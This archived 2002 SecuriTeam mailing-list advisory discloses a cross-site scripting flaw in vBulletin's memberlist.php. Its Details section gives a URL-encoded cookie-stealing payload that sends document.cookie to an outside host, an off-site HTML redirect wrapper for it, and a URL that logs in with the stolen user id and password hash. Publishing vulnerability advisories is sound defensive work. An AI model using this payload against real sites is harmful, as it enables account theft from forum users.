[UNIX] vBulletin's memberlist.php Allows Username and Password Stealing
From: support@securiteam.comDate: 03/23/02
- Previous message: support@securiteam.com: "[UNIX] Local Privilege Escalation Issues with Webmin"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sat, 23 Mar 2002 12:06:44 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
vBulletin's memberlist.php Allows Username and Password Stealing
------------------------------------------------------------------------
SUMMARY
vBulletin is a commonly used web forum system written in PHP. One of its
key features is use of templates, which allow the board administrator to
dynamically modify the look of the board. A security vulnerability in the
program allows attackers to insert malicious HTML and JavaScript into the
memberlist.php results, this would allow an attacker to steal the username
and password of users clicking on the malicious URL.
DETAILS
Within the first few lines of code in memberlist.php, the variable
$letterbits is evaluated. Because of the way PHP initializes variables,
we can inject HTML or JavaScript into the document. So by directing a
user to, for example:
http://vulnerable/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)
You can steal the user's password hash and user id. Because of the way
vBulletin parses URLs, the above will not function inside the forum, but
if we put this in an off-site html file:
<script>
location =
"http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user
doesn't even have to be aware of what has transpired, the above link will
proceed first to the memberlist w/cookie stealing code, and then to
http://www.swgmotu.com.
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
ADDITIONAL INFORMATION
The information has been provided by <mailto:plato@swgmotu.com> plato.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Local Privilege Escalation Issues with Webmin"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
